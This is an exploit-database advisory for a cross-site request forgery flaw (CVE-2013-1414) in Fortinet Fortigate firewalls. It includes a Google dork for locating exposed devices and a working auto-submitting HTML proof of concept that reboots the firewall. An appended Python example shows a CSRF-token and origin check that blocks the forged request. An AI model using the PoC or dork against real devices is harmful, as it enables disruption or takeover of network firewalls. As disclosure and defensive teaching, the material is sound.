exploitdb | Sven Wurth | EDB-ID:26528
History: Jul 01, 2013 - 12:00 a.m.

Fortigate Firewalls - Cross-Site Request Forgery

2013-07-01 00:00:00
Sven Wurth
www.exploit-db.com

CVSS2: 5.1 Medium
Attack Vector: NETWORK
Attack Complexity: HIGH
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
Vector: AV:N/AC:H/Au:N/C:P/I:P/A:P
AI Score: 6.9 Medium (Confidence: Low)
EPSS: 0.002 Low (Percentile: 52.3%)

Vulnerability ID: CVE-2013-1414
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Product: All Fortigate Firewalls
Vendor: Fortinet http://www.fortinet.com
Vulnerable Version: < 4.3.13 &  < 5.0.2
 
Description
==========
Because many functions are not protected by CSRF tokens, it is possible (under certain conditions) to modify system settings or firewall policies, or to take control of the whole firewall.
 
Requirements
===========
An attacker needs to know the IP address of the device.
An administrator needs an authenticated connection to the device.
 
 
Report-Timeline:
================
Vendor Notification: 11 July 2012
Vendor released version 5.0.2: 18 March 2013
Vendor released version 4.3.13: 29 April 2013
Status: Fixed
 
Google Dork:
==========
 -english -help -printing  -companies -archive  -wizard -pastebin -adult -keywords "Warning: this page requires Javascript. To correctly view, please enable it in your browser"
 
 
Credit:
=====
Sven Wurth     [email protected]
 
 
PoC
====
 
This example will reboot a Fortinet firewall.
It is just one of many ways this vulnerability can be exploited.
 
##### CSRF - Proof Of Concept ####
<html>
<body>
<!-- Auto-submitting form: posts the reboot action to the firewall's
     management interface using the administrator's existing session -->
<form name="myForm" id="myForm"
                action="https://###_VICTIM_IP_###/system/maintenance/shutdown" method="post">
                <input type="hidden" name="reason" value="">
                <input type="hidden" name="action" value="1">
                <input type="submit" name="add" value="rebootme">
</form>
<script type='text/javascript'>document.myForm.submit();</script>
</body>
</html>
##### End Poc #####
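
The missing control, as an added example (not part of the original advisory and not Fortinet's actual fix): a server-side check that binds a CSRF token to the admin session and verifies the request origin, run against a constructed request shaped like the PoC form post. The origin `https://fw.example.test`, the `csrf_token` field name and the session id are assumptions.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SERVER_KEY = secrets.token_bytes(32)        # per-boot secret, never sent to the browser
TRUSTED_ORIGIN = "https://fw.example.test"  # assumed management UI origin (placeholder)


def issue_token(session_id: str) -> str:
    """Token the UI embeds in every form it renders for this session."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def same_origin(headers: dict) -> bool:
    """Compare Origin (or Referer as fallback) with the UI's own origin."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False  # fail closed when the browser sent neither header
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == TRUSTED_ORIGIN


def allow_state_change(method: str, headers: dict, session_id: str, form: dict) -> bool:
    """Decide whether an authenticated, state-changing request may proceed."""
    if method != "POST" or not same_origin(headers):
        return False
    supplied = form.get("csrf_token", "")
    expected = issue_token(session_id)
    # Constant-time comparison; bytes avoid errors on non-ASCII input.
    return hmac.compare_digest(supplied.encode(), expected.encode())


# Constructed requests for the demonstration; session id and origins are made up.
SESSION = "constructed-admin-session-id"
FORGED = {   # what the PoC form sends: the admin's cookie rides along, no token
    "headers": {"Origin": "https://attacker.example.test"},
    "form": {"reason": "", "action": "1", "add": "rebootme"},
}
GENUINE = {  # the same action submitted from the management UI's own page
    "headers": {"Origin": TRUSTED_ORIGIN},
    "form": {"reason": "", "action": "1", "csrf_token": issue_token(SESSION)},
}

if __name__ == "__main__":
    for name, req in (("forged", FORGED), ("genuine", GENUINE)):
        ok = allow_state_change("POST", req["headers"], SESSION, req["form"])
        print(f"{name}: {'allowed' if ok else 'rejected'}")
```

Either check alone stops the PoC request; the token check still holds if a browser omits or a proxy strips the Origin and Referer headers only when the request is then rejected, which is why `same_origin` fails closed.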
